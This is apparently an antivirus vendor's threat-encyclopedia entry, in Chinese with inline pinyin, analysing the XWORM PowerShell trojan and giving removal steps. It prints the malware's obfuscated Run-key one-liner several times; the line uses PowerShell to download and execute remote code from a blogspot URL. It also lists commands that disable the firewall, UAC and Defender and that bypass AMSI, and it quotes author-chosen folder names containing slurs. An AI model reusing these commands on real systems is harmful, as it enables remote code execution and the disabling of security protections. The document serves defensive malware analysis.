Trojan.PS1.XWORM.AB
Windows

恶意软件类型:
Trojan
有(yǒu)破坏性?:
没有(yǒu)
加密?:
In the Wild:
是的
概要
它以文(wén)件的形式出现在系统中(zhōng),可(kě)能(néng)是其他(tā)恶意软件投放的,或者是用(yòng)户在访问恶意网站时无意中(zhōng)下载的。
技(jì )术详细信息
新(xīn)病毒详细信息
它以文(wén)件的形式出现在系统中(zhōng),可(kě)能(néng)是其他(tā)恶意软件投放的,或者是用(yòng)户在访问恶意网站时无意中(zhōng)下载的。
安(ān)装(zhuāng)
它添加下列文(wén)件夹:
- %ProgramData%\nipplesnigger → Deletes afterwards
它植入下列文(wén)件:
- %ProgramData%\nipplesnigger\KAMASUTRAKIM.~!!@#!!!!!!!!!!!!!!!~ → Deletes afterward
它添加下列进程:
- netsh.exe advfirewall set allprofiles state off -ErrorAction Silently Continue
自启动技(jì )术
它添加下列注册表项,在系统每次启动时自行执行:
HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Run
lexerti1 = schtasks /run /tn lexerti1
HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Run
lexerti2 = "javascript:xwge=['Scripting.FileSystemObject','WScript.Shell','powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm allinalcleanedcap.blogspot.com////////////////////atom.xml | iex);Start-Sleep -Seconds 5;','run']; xwwt=[xwge[3],xwge[0],xwge[1],xwge[2]]; new ActiveXObject(xwwt[2])[xwwt[0]](xwwt[3], 0, true);close();new ActiveXObject(xwwt[1]).DeleteFile(WScript.ScriptFullName)
其他(tā)系统修改
它添加下列注册表项:
HKEY_CURRENT_USER\Software\Classes\
CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32
(Default) = C:\IDontExist.dll
它修改下列注册表项:
HKEY_LOCAL_MACHINE\Software\Microsoft\
CurrentVersion\Policies\System
EnableLUA = 0
(Note: The default value data of the said registry entry is 1.)
进程终止
它终止在受感染的系统内存中(zhōng)运行的下列进程:
- RegSvcs
- Mshta
- Wscript
- Msbuild
其他(tā)详细信息
它添加下列注册表键值:
HKEY_CURRENT_USER\Software\Classes\
CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}
HKEY_CURRENT_USER\Software\Classes\
CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32
该程序执行以下操作(zuò):
- Terminates process containing .bat.exe in its process name
- Deletes files in the following folders:
- %Application Data%
- %Public%
- %User Startup%
- with the following extensions:
- .bat
- .ps1
- .lnk
- .bat.exe
- .cmd
- Deletes files in the following folders:
- %Public%
- %Application Data%
- %ProgramData%
- with the following extension:
- .vbs
- Exclude the following in Windows Defender scans:
- Extensions:
- .ppam
- .xls
- .docx
- .vbs
- .js
- Drives:
- C:\
- D:\
- E:\
- Processes:
- explorer.exe
- kernel32.dll
- aspnet_compiler.exe
- cvtres.exe
- CasPol.exe
- csc.exe
- Msbuild.exe
- ilasm.exe
- InstallUtil.exe
- jsc.exe
- powershell.exe
- rundll32.exe
- conhost.exe
- Csript.exe
- mshta.exe
- cmd.exe
- DefenderisasuckingAntivirus
- wscript.exe
- IP Address:
- 127.0.0.1
- Disable Windows Defender
- It bypasses the Antimalware Scan Interface (AMSI).
(注意: %User Startup% 是当前用(yòng)户的启动文(wén)件夹,通常位于 C:\Windows\Profiles\{user name}\Start Menu\Programs\Startup (Windows 98 和 ME)、C:\WINNT\Profiles\{user name}\Start Menu\Programs\Startup (Windows NT)、C:\Documents and Settings\{User name}\Start Menu\Programs\Startup (Windows 2003(32-bit)、XP、2000(32-bit)) 和 C:\Users\{user name}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup (Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit))。)
解决方案
Step 1
对于Windows ME和XP用(yòng)户,在扫描前,请确认已禁用(yòng)系统还原功能(néng),才可(kě)全面扫描计算机。
Step 2
注意:在此恶意软件/间谍软件/灰色软件执行期间,并非所有(yǒu)文(wén)件、文(wén)件夹和注册表键值和项都会安(ān)装(zhuāng)到您的计算机上。这可(kě)能(néng)是由于不完整的安(ān)装(zhuāng)或其他(tā)操作(zuò)系统条件所致。如果您没有(yǒu)找到相同的文(wén)件/文(wén)件夹/注册表信息,请继续进行下一步操作(zuò)。
Step 3
恢复该修改的注册表值
注意事项:错误编辑Windows注册表会导致不可(kě)挽回的系统故障。只有(yǒu)在您掌握后或在系统管理(lǐ)员的帮助下才能(néng)完成这步。或者,请先阅读Microsoft文(wén)章,然后再修改计算机注册表。
- In HKEY_LOCAL_MACHINE\Software\Microsoft\CurrentVersion\Policies\System
- EnableLUA = 0
- EnableLUA = 0
Step 4
删除该注册表值
注意事项:错误编辑Windows注册表会导致不可(kě)挽回的系统故障。只有(yǒu)在您掌握后或在系统管理(lǐ)员的帮助下才能(néng)完成这步。或者,请先阅读Microsoft文(wén)章,然后再修改计算机注册表。
- In HKEY_CURRENT_USER\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32
- (Default) = C:\IDontExist.dll
- (Default) = C:\IDontExist.dll
- In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
- lexerti1 = schtasks /run /tn lexerti1
- lexerti1 = schtasks /run /tn lexerti1
- In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
- lexerti2 = "javascript:xwge=['Scripting.FileSystemObject','WScript.Shell','powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm allinalcleanedcap.blogspot.com////////////////////atom.xml | iex);Start-Sleep -Seconds 5;','run']; xwwt=[xwge[3],xwge[0],xwge[1],xwge[2]]; new ActiveXObject(xwwt[2])[xwwt[0]](xwwt[3], 0, true);close();new ActiveXObject(xwwt[1]).DeleteFile(WScript.ScriptFullName)
- lexerti2 = "javascript:xwge=['Scripting.FileSystemObject','WScript.Shell','powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm allinalcleanedcap.blogspot.com////////////////////atom.xml | iex);Start-Sleep -Seconds 5;','run']; xwwt=[xwge[3],xwge[0],xwge[1],xwge[2]]; new ActiveXObject(xwwt[2])[xwwt[0]](xwwt[3], 0, true);close();new ActiveXObject(xwwt[1]).DeleteFile(WScript.ScriptFullName)
Step 5
删除该注册表键值
注意事项:错误编辑Windows注册表会导致不可(kě)挽回的系统故障。只有(yǒu)在您掌握后或在系统管理(lǐ)员的帮助下才能(néng)完成这步。或者,请先阅读Microsoft文(wén)章,然后再修改计算机注册表。
- In HKEY_CURRENT_USER\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32
- In HKEY_CURRENT_USER\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}
Step 6
Deleting Scheduled Tasks
The following {Task Name} - {Task to be run} listed should be used in the steps identified below:
- lexerti1 - mshta {Script}
For Windows 2000, Windows XP, and Windows Server 2003:
- Open the Windows Scheduled Tasks. Click Start>Programs>Accessories>
System Tools>Scheduled Tasks. - Locate each {Task Name} values listed above in the Name column.
- Right-click on the said file(s) with the aforementioned value.
- Click on Properties. In the Run field, check for the listed {Task to be run}.
- If the strings match the list above, delete the task.
For Windows Vista, Windows 7, Windows Server 2008, Windows 8, Windows 8.1, and Windows Server 2012:
- Open the Windows Task Scheduler. To do this:
• On Windows Vista, Windows 7, and Windows Server 2008, click Start, type taskschd.msc in the Search input field, then press Enter.
• On Windows 8, Windows 8.1, and Windows Server 2012, right-click on the lower left corner of the screen, click Run, type taskschd.msc, then press Enter. - In the left panel, click Task Scheduler Library.
- In the upper-middle panel, locate each {Task Name} values listed above in the Name column.
- In the lower-middle panel, click the Actions tab. In the Details column, check for the {Task to be run} string.
- If the said string is found, delete the task.
Step 7
使用(yòng)亚信安(ān)全产(chǎn)品扫描计算机,并删除检测到的Trojan.PS1.XWORM.AB文(wén)件 如果检测到的文(wén)件已被亚信安(ān)全产(chǎn)品清除、删除或隔离,则无需采取进一步措施。可(kě)以选择直接删除隔离的文(wén)件。请参阅知识库页(yè)面了解详细信息。